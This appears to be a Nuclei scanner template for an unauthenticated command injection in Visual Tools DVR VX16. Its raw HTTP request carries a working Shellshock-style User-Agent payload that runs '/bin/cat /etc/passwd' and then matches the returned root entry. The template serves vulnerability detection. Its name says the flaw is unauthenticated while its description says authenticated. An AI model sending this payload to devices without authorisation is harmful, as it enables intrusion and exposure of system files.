id: visual-tools-dvr-rce info: name: Visual Tools DVR VX16 4.2.28.0 - OS Command Injection (Unauthenticated) author: gy741 severity: critical description: vulnerabilities in the web-based management interface of Visual Tools DVR VX16 4.2.28.0 could allow an authenticated, remote attacker to perform command injection attacks against an affected device. reference: - https://www.exploit-db.com/exploits/50098 tags: visualtools,rce,oob requests: - raw: - | GET /cgi-bin/slogin/login.py HTTP/1.1 Host: {{Hostname}} Accept: */* User-Agent: () { :; }; echo ; echo ; /bin/cat /etc/passwd matchers-condition: and matchers: - type: regex regex: - "root:.*:0:0" - type: status status: - 200